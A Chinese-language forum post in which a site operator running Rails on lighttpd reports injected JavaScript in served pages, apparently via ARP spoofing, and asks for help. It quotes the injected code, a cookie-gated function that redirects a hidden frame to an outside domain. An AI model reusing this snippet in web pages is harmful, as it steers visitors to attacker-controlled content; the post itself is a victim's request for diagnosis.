环境:linux+lighttpd+fastcgi+ruby on rails(ruby 1.8.6 p279,rails 2.0.2)
在服务器上部署后,打开网页,发现在浏览器下方出现一个frame框,浏览源代码,发现一段新加的JS代码,链接到一个站长统计的网站,程序代码检查过没有被修改,不知道是否是服务器有漏洞被攻击了还是什么原因,有人有类似的经历或者哪位大侠告知一下原因和解决方法,不胜感激!
[b]问题补充:[/b]
恶意代码如下:
function showme() { var CK=document.cookie; var sa=CK.indexOf("CK"); if(sa!=-1){}else{var EP=new Date(); EP.setTime(EP.getTime()+24*60*60*1000); document.cookie="CK=test;expires="+EP.toGMTString(); self.hi.location="http://benpao2020.com/aa/a2.htm?1";} }
我对ARP攻击不甚了解,不知道有什么解决方法没有,感谢不吝赐教!